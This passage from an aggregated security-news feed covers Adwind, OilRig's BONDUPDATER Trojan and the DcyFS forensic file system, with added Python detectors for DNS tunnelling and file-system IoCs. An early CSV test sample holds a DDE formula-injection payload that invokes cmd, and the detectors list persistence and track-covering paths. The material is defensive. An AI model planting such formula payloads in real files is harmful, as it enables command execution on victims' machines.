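                   b"1,\"=cmd|'/c echo dde'!A0\"\n")


if __name__ == "__main__":
    print("benign:", scan_bytes(BENIGN_CSV))
    print("junk-prefixed:", scan_bytes(JUNK_PREFIX_CSV))
```

Because `scan_bytes` never looks at the extension, the same check applies whether the dropper arrives as `.csv`, `.xlt` or one of the other extensions the article mentions, which is the configuration gap Talos is warning about. The junk prefix decodes to replacement characters and is simply parsed as a first row, so it no longer hides the payload row. Binary spreadsheet formats would need a separate parser; this example only handles text.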

Further details, including IoCs, are reported in the analysis published by Talos.

Pierluigi Paganini

(Security Affairs – Adwind RAT, malware-as-a-service)

The post Experts uncovered a new Adwind campaign aimed at Linux, Windows, and macOS systems appeared first on Security Affairs.

A week in security (September 17 – 23)

Last week, we took a look at a low level spam campaign on Twitter, explored the signs of falling victim to phishing, and examined a massive WordPress compromise. We also explained some SASL vulnerabilities and covered a breaking Emotet spam campaign.

Other cybersecurity news:

Stay safe, everyone!

The post A week in security (September 17 – 23) appeared first on Malwarebytes Labs.

Malware hits Freelancers at Fiverr and Freelancer.com

By Waqas

Unfortunately, unsuspected freelancers are falling for the malware scam.  Fiverr and Freelancer.com are two of the most popular websites for freelancers and clients looking for skilled professionals. Currently, both sites have millions of registered users from hundreds of countries and that makes them lucrative targets for cybercriminals. Recently, security researchers at MalwareHunterTeam have discovered a new piece of […]

This is a post from HackRead.com Read the original post: Malware hits Freelancers at Fiverr and Freelancer.com

OilRig Group Aims BONDUPDATER Trojan Malware at Middle Eastern Governments

The OilRig threat group launched an attack involving the BONDUPDATER Trojan malware against a high-ranking government office in the Middle East.

According to Palo Alto Networks’ Unit 42, the threat group sent a series of spear phishing emails with a blank subject line to government workers in the region last month. Anyone who opened the attachment risked activating the latest version of BONDUPDATER, which offers backdoor functionality that lets threat actors execute commands and download files on infected machines.

OilRig, which has been active for at least two years, had previously used the Trojan malware in similar attacks against Middle Eastern governments.

What’s New in This Version of BONDUPDATER?

BONDUPDATER was first spotted in November 2017 and is based on Microsoft’s PowerShell. In the most recent attack, however, researchers found that the spear phishing emails contained a Word document with a macro that installed the Trojan malware. The process involved creating a series of files on the victim’s system and then gaining persistence by dropping a script that scheduled a task to execute every minute.

This version of BONDUPDATER used DNS TXT records, as well as A records, to communicate with the command-and-control (C&C) server, receiving them over a DNS tunneling protocol. This follows a pattern in which OilRig doesn’t always develop new tools, but simply saves development time by building on Trojan malware that’s already part of its arsenal.
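A scheduled task firing every minute and a C&C channel carried in DNS TXT and A records leave a characteristic shape in resolver logs: many unique, long subdomain labels under one domain, a high share of TXT queries, and near-constant spacing between queries. The Python below is an added example, not code from Unit 42 or Security Intelligence; the log format (`ts client qname qtype`), the domain names, the thresholds and the two-label approximation of a registered domain are all assumptions, and the query lines are constructed.

```python
"""Heuristic detection of DNS-tunnel beaconing in resolver query logs.

Added example, not code from Unit 42 or Security Intelligence. The log
format ("ts client qname qtype"), the domain names, the thresholds and the
two-label approximation of a registered domain are assumptions; the query
lines are constructed.
"""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed sample: one host issuing a TXT query with a fresh 24-character
# label every minute (the beacon), mixed with ordinary lookups.
SAMPLE_QUERIES = """\
2018-08-20T09:00:00Z 10.0.0.5 3f9a1c77e02b4d8a9e6f1b2c.c2-example.test TXT
2018-08-20T09:00:13Z 10.0.0.5 www.example.com A
2018-08-20T09:01:00Z 10.0.0.5 8b2d4e6f1a3c5e7d9f0b2a4c.c2-example.test TXT
2018-08-20T09:02:00Z 10.0.0.5 0c1d2e3f4a5b6c7d8e9f0a1b.c2-example.test TXT
2018-08-20T09:02:41Z 10.0.0.5 cdn.example.com A
2018-08-20T09:03:00Z 10.0.0.5 5e6f7a8b9c0d1e2f3a4b5c6d.c2-example.test TXT
2018-08-20T09:04:00Z 10.0.0.5 9a8b7c6d5e4f3a2b1c0d9e8f.c2-example.test TXT
2018-08-20T09:04:07Z 10.0.0.6 mail.example.org MX
2018-08-20T09:04:09Z 10.0.0.6 example.org A
2018-08-20T09:05:00Z 10.0.0.5 2b3c4d5e6f7a8b9c0d1e2f3a.c2-example.test TXT
"""


def parse_queries(text):
    """Parse constructed 'ts client qname qtype' lines into tuples."""
    rows = []
    for line in text.splitlines():
        if line.strip():
            ts, client, qname, qtype = line.split()
            rows.append((datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
                         client, qname.lower().rstrip("."), qtype))
    return rows


def split_name(qname):
    """Return (subdomain, registered_domain), approximating the registered
    domain as the last two labels (assumption; use a public-suffix list in
    production)."""
    labels = qname.split(".")
    return ".".join(labels[:-2]), ".".join(labels[-2:])


def tunnel_stats(rows):
    """Per (client, domain) indicators: query count, TXT share, mean label
    length, share of never-repeated labels, and the coefficient of variation
    of the inter-query interval (low means a regular beacon)."""
    groups = defaultdict(list)
    for ts, client, qname, qtype in rows:
        sub, domain = split_name(qname)
        groups[(client, domain)].append((ts, sub, qtype))
    stats = {}
    for key, items in groups.items():
        items.sort()
        subs = [s for _, s, _ in items]
        gaps = [(b[0] - a[0]).total_seconds() for a, b in zip(items, items[1:])]
        cv = pstdev(gaps) / mean(gaps) if len(gaps) > 1 and mean(gaps) > 0 else None
        stats[key] = {
            "queries": len(items),
            "txt_fraction": sum(q == "TXT" for _, _, q in items) / len(items),
            "mean_label_len": mean(len(s) for s in subs),
            "unique_ratio": len(set(subs)) / len(items),
            "interval_cv": cv,
        }
    return stats


def flag_tunnels(rows, min_queries=5, min_txt=0.5, min_label_len=16, max_cv=0.25):
    """Return sorted (client, domain) pairs whose indicators all exceed the
    (assumed) thresholds."""
    flagged = []
    for key, s in tunnel_stats(rows).items():
        if (s["queries"] >= min_queries and s["txt_fraction"] >= min_txt
                and s["mean_label_len"] >= min_label_len
                and s["interval_cv"] is not None and s["interval_cv"] <= max_cv):
            flagged.append(key)
    return sorted(flagged)


if __name__ == "__main__":
    data = parse_queries(SAMPLE_QUERIES)
    for key, s in tunnel_stats(data).items():
        print(key, s)
    print("flagged:", flag_tunnels(data))
```

The combination matters more than any single indicator: CDNs and anti-spam services also produce long labels and TXT lookups, but they rarely do so at a fixed cadence from one host with a label that never repeats. Thresholds are placeholders to tune against the resolver’s own traffic.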

Avoid Trojan Malware With UBA and IAM

In a recent podcast, IBM experts recommended layering on user behavior analytics (UBA) with identity and access management (IAM), which can make it easier to detect when employees exhibit potentially risky behaviors. This should be coupled with ongoing efforts to educate users about phishing schemes.

Source: Palo Alto Networks

The post OilRig Group Aims BONDUPDATER Trojan Malware at Middle Eastern Governments appeared first on Security Intelligence.

Following the Clues With DcyFS: A File System for Forensics

This article concludes our three-part series on Decoy File System (DcyFS) with a concrete example of how a cyber deception platform can also be a powerful tool for extracting forensic summaries. Using that data can expedite postmortem investigations, reveal attributing features of malware, and characterize the impact of attackers’ actions. Be sure to read part 1 and part 2 for the full story.

File System Overlays as Blank Canvases

When using Decoy File System (DcyFS), each subject’s view contains a stackable file system with an overlay layer. This layer helps protect files on the base file system, providing data integrity and confidentiality. The overlay also acts as a blank canvas, recording all created, modified and deleted files during suspicious user activity or the execution of an untrusted process.

These records are essential to piecing together what happens during a cyberattack as the overlay provides evidence of key indicators of compromise (IoCs) that investigators can use. To demonstrate the forensic capabilities of our approach, we created a module that analyzes overlays for IoCs and tested it with five different types of malware. The IoCs were sourced from the ATT&CK for Enterprise threat model.

DcyFS and the Forensics of Malware

Let’s take a closer look at the five malware types we identified with DcyFS’s analysis module and the IoCs collected through the file system overlays. We’ll also discuss how the file system actively helped protect critical systems from malware in our tests.

Persistence

Most malware is designed to persist on an infected endpoint and relaunch after a system reboot. The exact mechanism for persistence is dependent on whether the malware gains access to administrator privileges on the endpoint. If it does not, then the malware will typically modify user profile files that are run on startup.

Malware running with escalated privileges can modify systemwide configurations in order to persist. This is achieved by dropping initialization scripts into the system run-level directories. In certain cases, malware will create reoccurring tasks that ensure the malware is run on a schedule, persisting across reboots.

Each time a piece of malware modifies a system file, the changes are recorded on DcyFS’s overlay, enabling the forensic analyzer to easily identify malicious activity. Furthermore, since DcyFS provides per-process views to the malware, no file changes by the malware persist across the global file system view. This also means the malware is not restarted on a reboot.

Dynamic Link Library (DLL) Injection

Some malware, such as Umbreon and Jynx2, are not executables, but rather libraries designed to be preloaded by system processes. The libraries replace important system application programming interface (API) calls to change the functionality of a running application. In this way, an Apache web server can be turned into a backdoor, or a Bash shell can be hijacked to mine bitcoins in the background.

In Umbreon’s case, the malware replaces C API calls such as “accept,” “access” and “open” to hide its presence on the file system from an antivirus system or the system user. Umbreon also creates a user, and hides its presence using injected API calls. Such file system changes are identified by DcyFS, as is the injected malicious library. Furthermore, since the library is only loaded in its own view, it cannot be injected into any process running on the system.

Binary Downloaders (Modifiers)

Cybercrime is a mercurial commodity business, where large criminal syndicates rent access to extensive botnets to other attackers. These bots are designed to send malicious spam or download various pieces of malware, such as banking Trojans, bitcoin miners and keyloggers, to collect stolen data that can be monetized by the syndicate.

With administrative access to an infected endpoint, bots will try to download malware into many system directories, creating redundancy so that even if one copy is detected, the defender may miss another. As a result, newly installed binaries on a file system are a key IoC.

Aside from downloading new binaries, malware can also alter existing system binaries to make them secretly engage in nefarious activities. While running on DcyFS, these binary modifiers only appear to modify the overlay they can access — they are unable to modify the applications in the global view of the base file system. Consequently, they are never truly executed, but the modified binary appears prominently on the overlay, where it can be extracted and analyzed by a forensics team.

Backdoors

Typically, skilled attackers will try to cover their tracks to evade detection. One way of doing this is by saving malware into hidden files, such as any file starting with a period, or modifying programs such as “ls” or “dir” so that malware files are ignored when the contents of a directory are displayed to a user.

Another technique for hiding one’s presence is to remove entries from a user’s history profile or deleting task entries that conduct antivirus scans. Finally, killing or deleting antivirus software is another mechanism for ensuring that malicious activities are not uncovered. With DcyFS, each step used to cover one’s tracks is highlighted on the file system’s overlay.
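The four behaviours above (persistence, library injection, binary downloading or modification, and track covering) each map to a recognisable set of paths and operations, so an overlay export can be classified mechanically before an analyst looks at it. The Python below is an added example, not DcyFS code or anything from the IBM article; it assumes the overlay has been exported as `(operation, path)` pairs, where `delete` is a whiteout of a base-layer file, and the path patterns, category names and the overlay listing itself (file names such as `S99update`, `sysmon` and `kworkerd`) are constructed for illustration.

```python
"""Classify file changes recorded on a per-process overlay into IoC categories.

Added example, not code from DcyFS or the IBM article. It assumes the
overlay has been exported as (operation, path) pairs, where "delete" is a
whiteout of a base-layer file, and uses path patterns modelled on the
persistence, library-injection, binary-modification and track-covering
behaviours described above. The overlay listing and all names are constructed.
"""
import fnmatch
from collections import Counter

BIN_DIRS = ["/bin/*", "/sbin/*", "/usr/bin/*", "/usr/sbin/*", "/usr/local/bin/*"]

# (category, operations that trigger it, path globs).  fnmatch's "*" also
# crosses "/" here, which is what "/etc/cron*/*" and "/home/*/.bashrc" rely on.
RULES = [
    ("persistence", {"create", "modify"},
     ["/home/*/.bashrc", "/home/*/.profile", "/home/*/.bash_profile",
      "/root/.bashrc", "/root/.profile", "/etc/rc*.d/*", "/etc/init.d/*",
      "/etc/cron*/*", "/var/spool/cron/*", "/etc/systemd/system/*"]),
    ("library-injection", {"create", "modify"},
     ["/etc/ld.so.preload", "/lib/*.so*", "/lib64/*.so*",
      "/usr/lib/*.so*", "/usr/local/lib/*.so*"]),
    ("binary-modifier", {"modify"}, BIN_DIRS),
    ("binary-downloader", {"create"}, BIN_DIRS),
    ("track-covering", {"delete"},
     ["/home/*/.bash_history", "/root/.bash_history", "/var/log/*",
      "/etc/cron*/*"]),
]

SCRATCH_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")


def is_hidden_drop(op, path):
    """A created dot-file in a scratch directory, or anything created under a
    dot-directory outside /home (user dot-directories are too common)."""
    if op != "create":
        return False
    parts = path.split("/")[1:]
    dirs, name = parts[:-1], parts[-1]
    in_scratch = path.startswith(SCRATCH_DIRS)
    dot_dir = any(d.startswith(".") for d in dirs) and not path.startswith("/home/")
    return (name.startswith(".") and in_scratch) or dot_dir


def classify(op, path):
    """Return the list of IoC categories an overlay entry falls into."""
    cats = [cat for cat, ops, globs in RULES
            if op in ops and any(fnmatch.fnmatchcase(path, g) for g in globs)]
    if is_hidden_drop(op, path):
        cats.append("hidden-file")
    return cats


def analyze_overlay(entries):
    """Return ({path: [categories]}, Counter of categories) for an overlay."""
    report = {path: classify(op, path) for op, path in entries}
    return report, Counter(c for cats in report.values() for c in cats)


# Constructed overlay export covering each behaviour discussed in the text.
SAMPLE_OVERLAY = [
    ("modify", "/home/dev/.bashrc"),              # user-level persistence
    ("create", "/etc/rc2.d/S99update"),            # run-level script
    ("create", "/etc/cron.d/sysmon"),              # recurring task
    ("create", "/etc/ld.so.preload"),              # preload hook
    ("create", "/usr/lib/libfoo.so.1"),            # dropped shared object
    ("modify", "/bin/ls"),                         # modified system binary
    ("create", "/usr/bin/kworkerd"),               # downloaded binary
    ("create", "/tmp/.x11-cache/.agent"),          # hidden payload
    ("delete", "/home/dev/.bash_history"),         # history wiped
    ("delete", "/etc/cron.daily/clamav-scan"),     # AV scan task removed
    ("create", "/home/dev/notes.txt"),             # benign
]


if __name__ == "__main__":
    report, counts = analyze_overlay(SAMPLE_OVERLAY)
    for path, cats in report.items():
        print(f"{path:35} {', '.join(cats) or '-'}")
    print(dict(counts))
```

Because every entry comes from the overlay rather than from the global view, each hit is already both a finding and an isolated artifact: the modified `ls` or the dropped shared object can be pulled straight from the overlay for analysis while the base file system stays untouched, which is the property the article describes.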

Ransomware and Beyond

Ransomware has become a prominent part of the attack eco